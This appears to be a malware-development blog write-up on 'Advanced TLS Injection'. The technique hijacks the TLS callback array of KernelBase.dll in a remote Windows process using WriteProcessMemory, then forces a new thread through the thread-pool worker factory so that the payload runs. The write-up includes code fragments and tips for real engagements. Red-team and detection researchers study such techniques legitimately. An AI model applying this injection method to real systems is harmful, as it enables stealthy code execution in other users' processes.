Payload Execution

Hijacking a remote module's TLS callback to run a payload.

While the finer details of these TLS callbacks aren’t particularly important, we need to understand that each function within the array will get executed by the system each time a new thread is created. However, if a developer does not choose to implement TLS callbacks within their program, the compiled binary will not contain a TLS directory. This is crucial to understand because it was ultimately the limiting factor behind TLS Injection, a technique first shown off publicly by the founders of Maldev Academy, Mr. D0x and NULL.

The repository for this code can be found here: https://github.com/Maldev-Academy/RemoteTLSCallbackInjection

The idea behind their technique is fairly simple. First, create a child process in a suspended state using something like CreateProcessA. Then, read through the process’ image memory, and access the TLS directory. Finally, overwrite the first pointer within the callback array to point to a payload, which the attacker would have allocated previously. Once the main thread of the suspended process is resumed, it will run the malicious TLS callback.

This is an excellent technique, but it has some major flaws. Firstly, the executable image the process is created from must have TLS callbacks already registered, because if the binary doesn’t have any already, the TLS directory won’t exist, essentially rendering the technique impossible. Secondly, this technique restricts you into to creating your own process, rather than targeting an existing one.

These are fundamental problems that my variant of the technique fixes. I’ve decided to refer to it as Advanced TLS Injection, and it relies on two things to work. Firstly, we need to understand that TLS callbacks can exist within any PE file, which includes DLLs. TLS callbacks within these DLLs get executed by any threads that become “attached” to them. A thread is considered “attached” to a DLL when it’s created after said DLL is mapped. Luckily, KernelBase.dll fits our needs perfectly, as it contains registered TLS callbacks, and is also a core subsystem DLL that is loaded into virtually every process in Windows.

KernelBase.dll is an easy, reliable target for this kind of technique, and the base of it’s memory can be located very easily using the Windows snapshot API function, CreateToolhelp32Snapshot.

HANDLE CreateToolhelp32Snapshot(
  _In_ DWORD dwFlags,
  _In_ DWORD th32ProcessID
);

By passing in a flag of “TH32CS_SNAPMODULE” in the function’s first parameter, we can enumerate all loaded modules of the process that the PID passed as a second parameter belongs to, as well as the module's base address within that process.

Once we’ve located the base address of KernelBase within the remote process, we can copy over it’s PE headers using a function like ReadProcessMemory, which will get us the offset to it’s TLS directory.

Once we’ve also copied over the remote KernelBase’s TLS directory, we can simply call WriteProcessMemory to change the first pointer in it’s callback array, found via the directory’s AddressOfCallbacks member.

//change protections on the page, so we can modify the pointer
if (!VirtualProtectEx(
    targetProcess,
    reinterpret_cast<LPVOID>(pImgTlsDirectory->AddressOfCallBacks), 
    sizeof(void*),
    PAGE_READWRITE, //new protection value
    (PDWORD)&oldProtect)) {
    
    return false;
}

// Change the callback to point to our payload
if (!WriteProcessMemory(
    targetProcess,
    reinterpret_cast<LPVOID>(pImgTlsDirectory->AddressOfCallBacks),
    &remotePayload,
    sizeof(void*),
    nullptr)) {
    
    return false;
}

Note that we’re changing the memory protections to read/write here first, because it’s initially read only. This isn’t a particularly big deal, as changing protections to something that isn’t executable generally isn’t risky.

The trap is now set, and any new thread created within the remote process will trigger our payload for us. However, waiting around for a new thread to be created isn’t ideal, and is generally unreliable. Thankfully, I came up with a way to reliably trigger the malicious callback instantly, negating this issue.

If you read my previous write-up on exploiting Windows thread pools, you should remember what a worker factory is. It’s a central component of the Windows thread pool architecture, and facilitates the creation and deletion of new threads within the pool. We can acquire a handle to a remote process’ worker factory via Handle Hijacking, a technique I also went over extensively in the write-up. Essentially, we can acquire a handle to this worker factory, and then use the NtSetInformationWorkerFactory syscall to raise the minimum number of threads within the thread pool. If the new number is higher than the current number of threads, a new thread will be created.

NtSetInformationWorkerFactory(
    _In_ HANDLE WorkerFactoryHandle,
    _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
    _In_reads_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation,
    _In_ ULONG WorkerFactoryInformationLength
);

In other words, we can utilize this syscall to force the creation of a new thread within the process, which should trigger our malicious TLS callback.

The last thing that should be done is reverting the function pointer in the TLS callback array to it’s original value. This is because the callback may get triggered more than once otherwise, which would cause serious problems in a real engagement. In my repository for this technique, I didn’t do this; mainly because it uses the msfvenom “calc” payload for testing purposes, which will kill the process it runs in anyways. Just make sure you take this into consideration if you decide to implement the technique yourself.

Last updated